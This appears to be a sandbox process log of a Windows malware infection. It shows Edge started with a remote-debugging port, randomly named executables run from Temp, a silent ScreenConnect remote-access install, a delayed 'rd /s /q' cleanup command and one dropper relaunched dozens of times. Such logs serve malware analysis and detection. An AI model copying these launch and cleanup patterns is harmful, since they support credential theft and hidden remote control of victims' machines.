"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffb9ca146f8,0x7ffb9ca14708,0x7ffb9ca14718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2076 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2560 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2264 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2548 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3020 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2560 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2324 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2304 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4020 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4544 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe

"C:\Users\Admin\AppData\Local\Temp\10008470101\E3WGlpL.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4808 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3752 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2052,10987313719861150120,7681369544840585920,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5000 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe

"C:\Users\Admin\AppData\Local\Temp\10019810101\6NPpGdC.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2404 -ip 2404

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2404 -s 968

C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe

"C:\Users\Admin\AppData\Local\Temp\10021570101\VBUN8fn.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\s268q" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 11

C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe

"C:\Users\Admin\AppData\Local\Temp\10022320101\67e0HNq.exe"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\3be09d9e5e840c20\ScreenConnect.ClientSetup.msi"

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 1200B3204BB315F08E8EC7D17599F7B1 C

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI66A4.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_240674562 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe

